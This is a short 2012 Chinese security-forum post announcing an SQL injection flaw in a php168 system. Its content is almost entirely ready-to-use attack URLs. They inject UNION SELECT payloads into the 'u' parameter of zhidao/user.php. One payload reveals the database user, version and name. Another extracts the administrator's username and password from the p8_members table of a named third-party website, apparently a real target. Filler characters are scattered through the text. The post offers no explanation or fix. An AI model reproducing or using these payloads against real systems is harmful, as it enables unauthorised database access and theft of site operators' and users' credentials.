找回密码
 立即注册
查看: 3242|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--" K3 P- e+ N$ J5 d- D& z
                                                         0 t+ f7 A. c  Q! a: Y9 s5 ~2 I# S
                                       6 \$ u) E" q8 X# `2 |+ R

5 E8 l0 Z. N$ _. L  N
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--5 h0 o/ k% x4 Z5 ~: U
                                                       {) g8 Y, v2 L% u7 R
                                                                   1 {$ h- E* L( X" L0 B9 C- ]2 \" O4 l
                                                        
$ R* ~( z  X2 Q- _1 i- o3 s. z8 U+ [6 rhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--( [3 o5 R' ]& Z. j: ~
' N8 v* ^+ u+ ^$ H9 ^+ a1 q, ~

! Z  `5 t* X3 T9 J; u: N# V; j8 d2 c& R. x; P) T
                                                            
' O* ?# ]. r0 q+ b! z' t
! N% }4 o& Z! s- w* h+ a% Ahttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
6 F* s% }8 k$ t9 d/ \( {. d$ D. C) x2 I2 e6 ^

1 H2 y- U7 m9 s- L7 I, \, T' a6 l! y7 K' M' \
                                                                    ) I7 d* [, V5 F4 t( z+ r

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表